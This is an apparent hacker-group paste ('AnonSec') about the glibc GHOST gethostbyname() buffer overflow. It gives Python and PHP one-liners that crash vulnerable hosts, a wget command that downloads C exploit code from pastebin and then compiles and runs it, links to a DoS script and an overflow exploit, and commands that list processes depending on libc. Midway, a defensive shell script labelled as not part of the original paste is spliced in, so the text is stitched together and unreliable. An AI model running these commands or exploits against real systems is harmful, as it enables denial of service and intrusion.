- We are...
- _____ _________
- / _ \ ____ ____ ____ / _____/ ____ ____
- / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
- / | \ | ( <_> ) | \/ \ ___/\ \___
- \____|__ /___| /\____/|___| /_______ /\___ >\___ >
- \/ \/ \/ \/ \/ \/
- //Laughing at your security since 2012*
- =================================================================================================
- Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - PhantomGhost - Hannaichi - ap3x h4x0r
- - Gh05tFr3ak - spider64 - OverKiller - Cyb3r Shzz0r - Pr3d4T0r - Mr. BlackList
- - Razar - MR.WWW - AN0NT0XIC
- =================================================================================================
- [+] Check if vuln to Ghost: glibc gethostbyname() buffer overflow via Python, PHP, C and Shell [+]
- [+] Python [+]
- `python -c "print '0' * $((0x10000 - 16 * 1 - 2 * 4 - 1 - 4))" `
- Segmentation fault
- echo $?
- [+] PHP [+]
- php -r '$e="0";for($i=0;$i<2500;$i++){$e="0$e";} gethostbyname($e);'
- Segmentation fault
- [+] C [+]
- wget "http://pastebin.com/raw.php?i=7LFRPczm" -O ghost.c
- gcc ghost.c -o ghost
- ./ghost
- [+] ghost-smtp-dos.py [+]
- http://pastebin.com/QmngpTdy
- [+] GhostFlow.c - Ghost BufferOverflow [+]
- http://pastebin.com/7LFRPczm
- [+] Ghost.sh [+]
- http://pastebin.com/y9xGNrBi
- [+] Check your libc version [+]
- ldd --version
- Here is a list of potential targets that we investigated (they all call
- gethostbyname, one way or another), but to the best of our knowledge,
- the buffer overflow cannot be triggered in any of them:
- apache, cups, dovecot, gnupg, isc-dhcp, lighttpd, mariadb/mysql,
- nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd,
- pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers,
- vsftpd, xinetd.
- [+] Find Processes Dependent on glibc [+]
- lsof | grep libc | awk '{print $1}' | sort | uniq
- lsof | awk '/libc/{print $1 | "sort -u" }'  # you're welcome
- netstat -lnp | grep -e "\(tcp.*LISTEN\|udp\)" | cut -d / -f 2- | sort -u
- sudo netstat -lnp | awk -F/ '/LISTEN /{print $2}'
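
The glibc process listing above only says who has libc loaded. The sketch below is an added example, not part of the original paste: it reads each process's maps file and also marks processes still running a libc that has since been replaced on disk, which are the ones that need a restart after the package is updated. The function name `libc_users` and its optional proc-root argument are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the paste). Lists every process that maps glibc and
# marks it STALE when the mapped libc file was deleted/replaced on disk, i.e.
# the process keeps the old library until it is restarted.
# libc_users and its proc-root argument are hypothetical names; the argument
# exists so the function can be exercised against a constructed directory tree.

libc_users() {
    proc_root="${1:-/proc}"
    for dir in "$proc_root"/[0-9]*; do
        # Skip processes we may not inspect (run as root to see all of them).
        [ -r "$dir/maps" ] || continue
        pid="${dir##*/}"
        name="$(cat "$dir/comm" 2>/dev/null || true)"
        [ -n "$name" ] || name='?'
        awk -v pid="$pid" -v name="$name" '
            # Field 6 of a maps line is the backing file. Match libc.so.N and
            # libc-2.NN.so, but not libcrypto, libcap, libc++ and the like.
            $6 ~ "/libc[-.][^/]*so" {
                found = 1
                # The kernel appends "(deleted)" when the file was unlinked.
                if ($NF == "(deleted)") stale = 1
            }
            END { if (found) print pid, name, (stale ? "STALE" : "current") }
        ' "$dir/maps" 2>/dev/null || true
    done
}

# Scan the live system only when asked to: sh thisfile.sh --scan
if [ "${1:-}" = "--scan" ]; then
    libc_users /proc
fi
```

Output is one line per process: PID, command name, and `STALE` or `current`.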
- [+] Code Analysis [+]
- gethostbyname() and friends fill in struct hostent:
- struct hostent {
-     char *h_name; /* official name of host */
-     char **h_aliases; /* alias list */
-     int h_addrtype; /* host address type */
-     int h_length; /* length of address */
-     char **h_addr_list; /* list of addresses */
- };
- *buffer_size = size_needed;
- new_buf = (char *) realloc (*buffer, *buffer_size);
-
- if (new_buf == NULL)
- {
- ...
-     goto done;
- }